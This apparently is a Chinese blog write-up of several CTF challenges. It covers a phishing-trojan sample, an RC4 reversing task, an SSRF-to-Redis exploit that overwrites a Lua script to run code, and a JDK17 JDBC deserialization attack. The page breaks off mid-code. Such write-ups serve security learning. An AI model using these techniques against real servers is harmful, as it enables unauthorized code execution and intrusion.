<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="google-site-verification" content="FVeTimbT1kTEtyy7CZnjl87tv6Zu3gYnjspaqbsrZ6M" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="钓鱼邮件这题是签到题，给了一个邮件，我是用的飞书打开的   这里面有一个附件打开需要密码可以看到提示和邮件日期时间推测为生日密码。打开之后是一个木马样本丢到微步没分析出来外联ip和端口于是就放自己本地虚拟机跑了下看网络通信，能找到ip直接md5加密提交即可    donntyousee首先去除花枝令，是把一个函数拆分成了两段，把图中一段nop掉再U+P，需要对俩个函数去花，第一个是start中40">
<meta property="og:type" content="article">
<meta property="og:title" content="软件系统安全攻防赛Wp">
<meta property="og:url" content="https://oceanzbz.github.io/post/e5e27309.html">
<meta property="og:site_name" content="Oceanzbz&#39;s Blog">
<meta property="og:description" content="钓鱼邮件这题是签到题，给了一个邮件，我是用的飞书打开的   这里面有一个附件打开需要密码可以看到提示和邮件日期时间推测为生日密码。打开之后是一个木马样本丢到微步没分析出来外联ip和端口于是就放自己本地虚拟机跑了下看网络通信，能找到ip直接md5加密提交即可    donntyousee首先去除花枝令，是把一个函数拆分成了两段，把图中一段nop掉再U+P，需要对俩个函数去花，第一个是start中40">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250106121545994.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250106121727731.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250106121816891.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250106121831656.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250106122446596.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250106122525393.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250106122635128.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250106122659874.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250106122734510.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250106122819523.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250106122809730.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250221202559154.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250221202740610.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250221203102746.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250221212153424.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250221212218298.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250221213224950.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250221213242950.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250221214715766.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250221214745645.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250221214839470.png">
<meta property="og:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250221215035253.png">
<meta property="article:published_time" content="2025-01-06T04:13:54.000Z">
<meta property="article:modified_time" content="2025-02-21T16:09:19.529Z">
<meta property="article:author" content="Oceanzbz">
<meta property="article:tag" content="CTFWP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://oceanzbz.github.io/post/undefined/IMAGE20250106121545994.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>软件系统安全攻防赛Wp</title>
    <!-- async scripts -->
    <!-- Google Analytics -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=G-QWTJSPQL4F"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'G-QWTJSPQL4F');
  </script>


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/atom.xml" title="Oceanzbz&#39;s Blog" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/link/">Friends</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/post/7e872f66.html"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/post/499b5c8b.html"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://oceanzbz.github.io/post/e5e27309.html"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://oceanzbz.github.io/post/e5e27309.html&text=软件系统安全攻防赛Wp"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://oceanzbz.github.io/post/e5e27309.html&title=软件系统安全攻防赛Wp"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://oceanzbz.github.io/post/e5e27309.html&is_video=false&description=软件系统安全攻防赛Wp"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=软件系统安全攻防赛Wp&body=Check out this article: https://oceanzbz.github.io/post/e5e27309.html"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://oceanzbz.github.io/post/e5e27309.html&title=软件系统安全攻防赛Wp"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://oceanzbz.github.io/post/e5e27309.html&title=软件系统安全攻防赛Wp"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://oceanzbz.github.io/post/e5e27309.html&title=软件系统安全攻防赛Wp"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://oceanzbz.github.io/post/e5e27309.html&title=软件系统安全攻防赛Wp"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://oceanzbz.github.io/post/e5e27309.html&name=软件系统安全攻防赛Wp&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://oceanzbz.github.io/post/e5e27309.html&t=软件系统安全攻防赛Wp"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6"><span class="toc-number">1.</span> <span class="toc-text">钓鱼邮件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#donntyousee"><span class="toc-number">2.</span> <span class="toc-text">donntyousee</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CachedVisitor"><span class="toc-number">3.</span> <span class="toc-text">CachedVisitor</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JDBCParty"><span class="toc-number">4.</span> <span class="toc-text">JDBCParty</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#jdk17-%E5%8F%8D%E5%B0%84%E5%88%A9%E7%94%A8"><span class="toc-number">4.1.</span> <span class="toc-text">jdk17 反射利用</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        软件系统安全攻防赛Wp
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Oceanzbz</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-01-06T04:13:54.000Z" class="dt-published" itemprop="datePublished">2025-01-06</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/CTF/">CTF</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/CTFWP/" rel="tag">CTFWP</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="钓鱼邮件"><a href="#钓鱼邮件" class="headerlink" title="钓鱼邮件"></a>钓鱼邮件</h2><p>这题是签到题，给了一个邮件，我是用的飞书打开的</p>
<img src="/post/undefined/IMAGE20250106121545994.png" class="">

<p>这里面有一个附件打开需要密码可以看到提示和邮件日期时间推测为生日密码。打开之后是一个木马样本丢到微步没分析出来外联ip和端口于是就放自己本地虚拟机跑了下看网络通信，能找到ip直接md5加密提交即可</p>
<img src="/post/undefined/IMAGE20250106121727731.png" class="">


<h2 id="donntyousee"><a href="#donntyousee" class="headerlink" title="donntyousee"></a>donntyousee</h2><p>首先去除花枝令，是把一个函数拆分成了两段，把图中一段nop掉再U+P，需要对俩个函数去花，第一个是start中405559，的第二个函数是动调查看的405eaa。</p>
<img src="/post/undefined/IMAGE20250106121816891.png" class="">

<p>发现是rc4算法，变异了一步异或0x23,密文需要动调查看，密文如下：</p>
<img src="/post/undefined/IMAGE20250106121831656.png" class="">

<p>比较恶心的是存在反调试，因此动调获得的密钥是错误的，静态查看的密钥是正确的。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> ARC4</span><br><span class="line"></span><br><span class="line">  </span><br><span class="line"></span><br><span class="line">key = <span class="string">b&#x27;\x92\x1C+\x1F\xBA\xFB\xA2\xFF\ai&#125;w\x18\x8C&#x27;</span></span><br><span class="line"></span><br><span class="line">ciphertext = <span class="built_in">bytearray</span>([<span class="number">0x25</span>,<span class="number">0xCD</span>, <span class="number">0x54</span>, <span class="number">0xAF</span>, <span class="number">0x51</span>, <span class="number">0x1C</span>, <span class="number">0x58</span>, <span class="number">0xD3</span>, <span class="number">0xA8</span>, <span class="number">0x4B</span>, <span class="number">0x4F</span>, <span class="number">0x56</span>, <span class="number">0xEC</span>, <span class="number">0x83</span>, <span class="number">0x5D</span>, <span class="number">0xD4</span>, <span class="number">0xF6</span>, <span class="number">0x47</span>, <span class="number">0x4A</span>, <span class="number">0x6F</span>, <span class="number">0xE0</span>, <span class="number">0x73</span>, <span class="number">0xB0</span>, <span class="number">0xA5</span>, <span class="number">0xA8</span>, <span class="number">0xC3</span>, <span class="number">0x17</span>, <span class="number">0x81</span>, <span class="number">0x5E</span>, <span class="number">0x2B</span>, <span class="number">0xF4</span>, <span class="number">0xF6</span>, <span class="number">0x71</span>, <span class="number">0xEA</span>, <span class="number">0x2F</span>, <span class="number">0xFF</span>, <span class="number">0xA8</span>, <span class="number">0x63</span>, <span class="number">0x99</span>, <span class="number">0x57</span>]</span><br><span class="line"></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">cipher = ARC4.new(key)</span><br><span class="line"></span><br><span class="line">decrypted_data = cipher.decrypt(ciphertext)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> decrypted_data:</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">chr</span>(i ^ <span class="number">0x23</span>),end = <span class="string">&#x27;&#x27;</span>)</span><br></pre></td></tr></table></figure>

<h2 id="CachedVisitor"><a href="#CachedVisitor" class="headerlink" title="CachedVisitor"></a>CachedVisitor</h2><p>这题自己有点蠢了当时比赛的时候看着能进复赛了就走了没做，因为前面确实尝试了很多次忘了附件里给了readflag导致一直没打成功赛后吃了个海底捞回来复现了一下做出来的太蠢了自己。</p>
<p>先来看看源码</p>
<figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">local</span> <span class="function"><span class="keyword">function</span> <span class="title">read_file</span><span class="params">(filename)</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> file = <span class="built_in">io</span>.<span class="built_in">open</span>(filename, <span class="string">&quot;r&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> <span class="keyword">not</span> file <span class="keyword">then</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Error: Could not open file &quot;</span> .. filename)</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> <span class="literal">nil</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  </span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> content = file:<span class="built_in">read</span>(<span class="string">&quot;*a&quot;</span>)</span><br><span class="line"></span><br><span class="line">file:<span class="built_in">close</span>()</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> content</span><br><span class="line"></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  </span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> <span class="function"><span class="keyword">function</span> <span class="title">execute_lua_code</span><span class="params">(script_content)</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> lua_code = script_content:<span class="built_in">match</span>(<span class="string">&quot;##LUA_START##(.-)##LUA_END##&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> lua_code <span class="keyword">then</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> chunk, err = <span class="built_in">load</span>(lua_code)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> chunk <span class="keyword">then</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> success, result = <span class="built_in">pcall</span>(chunk)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> <span class="keyword">not</span> success <span class="keyword">then</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Error executing Lua code: &quot;</span>, result)</span><br><span class="line"></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Error loading Lua code: &quot;</span>, err)</span><br><span class="line"></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Error: No valid Lua code block found.&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  </span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> <span class="function"><span class="keyword">function</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> filename = <span class="string">&quot;/scripts/visit.script&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> script_content = read_file(filename)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> script_content <span class="keyword">then</span></span><br><span class="line"></span><br><span class="line">execute_lua_code(script_content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  </span><br><span class="line"></span><br><span class="line">main()</span><br></pre></td></tr></table></figure>

<p>scripts文件夹下的文件 visit.script</p>
<figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line">##LUA_START##</span><br><span class="line"><span class="keyword">local</span> curl = <span class="built_in">require</span>(<span class="string">&quot;cURL&quot;</span>)</span><br><span class="line"><span class="keyword">local</span> redis = <span class="built_in">require</span>(<span class="string">&quot;resty.redis&quot;</span>)</span><br><span class="line"></span><br><span class="line">ngx.req.read_body()</span><br><span class="line"><span class="keyword">local</span> args = ngx.req.get_uri_args()</span><br><span class="line"><span class="keyword">local</span> url = args.url</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> <span class="keyword">not</span> url <span class="keyword">then</span></span><br><span class="line">    ngx.say(<span class="string">&quot;URL parameter is missing!&quot;</span>)</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> red = redis:new()</span><br><span class="line">red:set_timeout(<span class="number">1000</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> ok, err = red:connect(<span class="string">&quot;127.0.0.1&quot;</span>, <span class="number">6379</span>)</span><br><span class="line"><span class="keyword">if</span> <span class="keyword">not</span> ok <span class="keyword">then</span></span><br><span class="line">    ngx.say(<span class="string">&quot;Failed to connect to Redis: &quot;</span>, err)</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> res, err = red:get(url)</span><br><span class="line"><span class="keyword">if</span> res <span class="keyword">and</span> res ~= ngx.null <span class="keyword">then</span></span><br><span class="line">    ngx.say(res)</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> c = curl.easy &#123;</span><br><span class="line">    url = url,</span><br><span class="line">    timeout = <span class="number">5</span>,</span><br><span class="line">    connecttimeout = <span class="number">5</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> response_body = &#123;&#125;</span><br><span class="line"></span><br><span class="line">c:setopt_writefunction(<span class="built_in">table</span>.<span class="built_in">insert</span>, response_body)</span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> ok, err = <span class="built_in">pcall</span>(c.perform, c)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> <span class="keyword">not</span> ok <span class="keyword">then</span></span><br><span class="line">    ngx.say(<span class="string">&quot;Failed to perform request: &quot;</span>, err)</span><br><span class="line">    c:<span class="built_in">close</span>()</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">c:<span class="built_in">close</span>()</span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> response_str = <span class="built_in">table</span>.<span class="built_in">concat</span>(response_body)</span><br><span class="line"></span><br><span class="line"><span class="keyword">local</span> ok, err = red:setex(url, <span class="number">3600</span>, response_str)</span><br><span class="line"><span class="keyword">if</span> <span class="keyword">not</span> ok <span class="keyword">then</span></span><br><span class="line">    ngx.say(<span class="string">&quot;Failed to save response in Redis: &quot;</span>, err)</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">ngx.say(response_str)</span><br><span class="line">##LUA_END##</span><br></pre></td></tr></table></figure>

<p>这里没学过lua没明白啥意思丢个gpt问了问这个脚本是什么意思就是相当于是本地开了一个redis服务，然后curl可以发起请求连接这个redis服务也可以访问http将返回的值存入redis中。其实本质就是一个ssrf打redis。我这里直接使用dict协议去攻击redis，我的思路是去覆盖visit.script文件，因为main.lua功能主要是读取visit.script中的代码去执行的。</p>
<img src="/post/undefined/IMAGE20250106122446596.png" class="">

<img src="/post/undefined/IMAGE20250106122525393.png" class="">

<img src="/post/undefined/IMAGE20250106122635128.png" class="">
<img src="/post/undefined/IMAGE20250106122659874.png" class="">

<p>这里的16进制代码是</p>
<img src="/post/undefined/IMAGE20250106122734510.png" class="">

<p>然后直接save就可以了</p>
<img src="/post/undefined/IMAGE20250106122819523.png" class="">

<p>在访问下visit路由就可以看到flag了</p>
<img src="/post/undefined/IMAGE20250106122809730.png" class="">

<p>当时比赛没打出来原因是自己和队友一直想着去覆盖执行命令去了忘了使用这里的readflag，但是执行命令的代码有点长在redis传输过程中会有一些脏数据插入到里面所以导致一直覆盖的代码是有问题的。</p>
<p><a href="9c546db896fcd97d4c84f7fcf99357a3attachment_20250102085620033.zip">题目附件</a></p>
<h2 id="JDBCParty"><a href="#JDBCParty" class="headerlink" title="JDBCParty"></a>JDBCParty</h2><p>题目给了一个jar包反编译看看</p>
<img src="/post/undefined/IMAGE20250221202559154.png" class="">

<p>看路由可以看到存在一个直接的反序列化点。去看看依赖</p>
<img src="/post/undefined/IMAGE20250221202740610.png" class="">

<p>可以看到这些依赖像是去利用jndi，但是这里的jdk版本是17所以需要bypass。这里利用的是com.oracle.database.jdbc这个依赖实际上就是以下这个项目介绍的漏洞</p>
<p><a target="_blank" rel="noopener" href="https://github.com/luelueking/Deserial_Sink_With_JDBC">https://github.com/luelueking/Deserial_Sink_With_JDBC</a></p>
<img src="/post/undefined/IMAGE20250221203102746.png" class="">

<p>或者参考该文章也有介绍<br><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/14169">https://xz.aliyun.com/news/14169</a></p>
<p>为什么需要rmi打呢</p>
<img src="/post/undefined/IMAGE20250221212153424.png" class="">

<img src="/post/undefined/IMAGE20250221212218298.png" class="">

<p>这两个会报错。</p>
<h3 id="jdk17-反射利用"><a href="#jdk17-反射利用" class="headerlink" title="jdk17 反射利用"></a>jdk17 反射利用</h3><p>可以参考这两个师傅写的总结的很全面<br><a target="_blank" rel="noopener" href="https://forum.butian.net/share/3748">https://forum.butian.net/share/3748</a><br><a target="_blank" rel="noopener" href="https://pankas.top/2023/12/05/jdk17-%E5%8F%8D%E5%B0%84%E9%99%90%E5%88%B6%E7%BB%95%E8%BF%87/">https://pankas.top/2023/12/05/jdk17-%E5%8F%8D%E5%B0%84%E9%99%90%E5%88%B6%E7%BB%95%E8%BF%87/</a></p>
<p>来看一下其他师傅们的打法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span 